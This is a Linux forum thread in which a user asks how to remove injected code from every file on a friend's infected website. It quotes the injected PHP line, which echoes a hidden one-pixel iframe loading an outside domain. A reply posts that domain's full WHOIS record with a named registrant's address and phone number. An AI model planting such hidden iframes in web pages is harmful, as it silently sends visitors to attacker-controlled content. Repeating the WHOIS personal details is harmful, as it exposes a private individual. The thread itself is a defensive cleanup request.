Find the answer to your Linux question:
Results 1 to 3 of 3
All the files at one of my friend's website is virus infected, it has inserted following code in it. <? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?> Now I want to replace ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Jan 2006
    Posts
    1

    my friend's website is virus infected with this code


    All the files at one of my friend's website is virus infected, it has inserted following code in it.

    <? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?>

    Now I want to replace all the code with nothing.

    for a in $(find -type f -not -regex '.*\/\.svn.*'); do sed -e 's/<\?\s echo\s \(\'<html><head><title><\/title><\/head\><body><iframe\s src=\"http:\/\/www\.blackh\.info\/traff\/\"\s width=1\s height=1><\/iframe><\/body><\/html>\'\);\?>//g' $a > $a.modifiedfile; mv -f $a.modifiedfile $a; done

    since he is use subversion I can't edit inside .svn folders.

    This is not working as I am not comfortable with regex and escape characters.

    Please help urgently

    Thanks,
    AjiNIMC

  2. #2
    Banned CodeRoot's Avatar
    Join Date
    Sep 2005
    Posts
    567
    How many files?

    Can't you export/populate the data out of SVN?

  3. #3
    Linux Newbie beachboy's Avatar
    Join Date
    Apr 2005
    Location
    Rockford, MI 49341
    Posts
    125
    This is where the code is calling to:
    Code:
    Domain ID:D11497946-LRMS
    Domain Name:BLACKH.INFO
    Created On:12-Dec-2005 13:09:30 UTC
    Last Updated On:12-Dec-2005 16:26:20 UTC
    Expiration Date:12-Dec-2006 13:09:30 UTC
    Sponsoring Registrar:Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
    Status:TRANSFER PROHIBITED
    Registrant ID:DI_2202160
    Registrant Name:Mihail Krukov
    Registrant Organization:N/A
    Registrant Street1:Sovnarkomovskaya, 4, 25
    Registrant Street2:
    Registrant Street3:
    Registrant City:Nizhniy Novgorod
    Registrant State/Province:Moskovskaya oblast
    Registrant Postal Code:606660
    Registrant Country:RU
    Registrant Phone:+7.8312255554
    Registrant Phone Ext.:
    Registrant FAX:
    Registrant FAX Ext.:
    Registrant ************@mail.ru
    Admin ID:DI_2202160
    Admin Name:Mihail Krukov
    Admin Organization:N/A
    Admin Street1:Sovnarkomovskaya, 4, 25
    Admin Street2:
    Admin Street3:
    Admin City:Nizhniy Novgorod
    Admin State/Province:Moskovskaya oblast
    Admin Postal Code:606660
    Admin Country:RU
    Admin Phone:+7.8312255554
    Admin Phone Ext.:
    Admin FAX:
    Admin FAX Ext.:
    Admin ************@mail.ru
    Billing ID:DI_2202160
    Billing Name:Mihail Krukov
    Billing Organization:N/A
    Billing Street1:Sovnarkomovskaya, 4, 25
    Billing Street2:
    Billing Street3:
    Billing City:Nizhniy Novgorod
    Billing State/Province:Moskovskaya oblast
    Billing Postal Code:606660
    Billing Country:RU
    Billing Phone:+7.8312255554
    Billing Phone Ext.:
    Billing FAX:
    Billing FAX Ext.:
    Billing ************@mail.ru
    Tech ID:DI_2202160
    Tech Name:Mihail Krukov
    Tech Organization:N/A
    Tech Street1:Sovnarkomovskaya, 4, 25
    Tech Street2:
    Tech Street3:
    Tech City:Nizhniy Novgorod
    Tech State/Province:Moskovskaya oblast
    Tech Postal Code:606660
    Tech Country:RU
    Tech Phone:+7.8312255554
    Tech Phone Ext.:
    Tech FAX:
    Tech FAX Ext.:
    Tech ************@mail.ru
    Name Server:NS1.MEGAHOSTER.NET
    Name Server:NS2.MEGAHOSTER.NET
    Hope that this is a help for you.
    I would also send a copy of the cade to megahoster.net and let them know what is going on.
    <advertising NOT allowed in signatures>

  4. $spacer_open
    $spacer_close

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •